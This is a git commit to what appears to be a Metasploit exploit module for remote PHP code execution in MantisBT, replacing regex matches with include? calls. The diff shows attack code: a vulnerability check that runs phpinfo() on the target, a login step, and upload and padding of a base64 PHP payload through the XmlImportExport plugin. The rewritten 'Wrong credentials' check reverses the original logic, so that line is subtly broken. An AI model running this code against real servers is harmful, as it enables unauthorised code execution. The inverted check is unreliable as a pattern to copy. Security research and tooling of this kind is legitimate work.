favor include? over =~

firefart · firefart · commit d007b72ab34d · 2015-01-07T07:33:16.000+01:00
diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -51,7 +51,7 @@ def initialize(info = {})
   def check
     res = exec_php('phpinfo(); die();', true)
 
-    if res && res.body =~ /This program makes use of the Zend/
+    if res && res.body && res.body.include?('This program makes use of the Zend')
       return Exploit::CheckCode::Vulnerable
     else
       return Exploit::CheckCode::Unknown
@@ -91,7 +91,7 @@ def do_login()
       })
       fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
 
-      fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
+      fail_with(Failure::NoAccess, 'Wrong credentials') unless res && res.redirection.to_s.include?('login_page.php')
 
       session_cookie = "#{session_cookie} #{res.get_cookies}"
     end
@@ -119,12 +119,12 @@ def upload_xml(payload_b64, rand_text, cookies, is_check)
       }
     })
 
-    unless res && res.code == 200
+    unless res && res.code == 200 && res.body
       print_error('Error trying to access XmlImportExport/import page...')
       return false
     end
 
-    if res.body =~ /Plugin is not registered with MantisBT/i
+    if res.body.include?('Plugin is not registered with MantisBT')
       print_error('XMLImportExport plugin is not installed')
       return false
     end
@@ -237,7 +237,7 @@ def exec_php(php_code, is_check = false)
     payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
 
     # clean b64 payload
-    while Rex::Text.encode_base64(payload_clean) =~ /=/
+    while Rex::Text.encode_base64(payload_clean).include?('=')
       payload_clean = "#{ payload_clean } "
     end
     payload_b64 = Rex::Text.encode_base64(payload_clean)
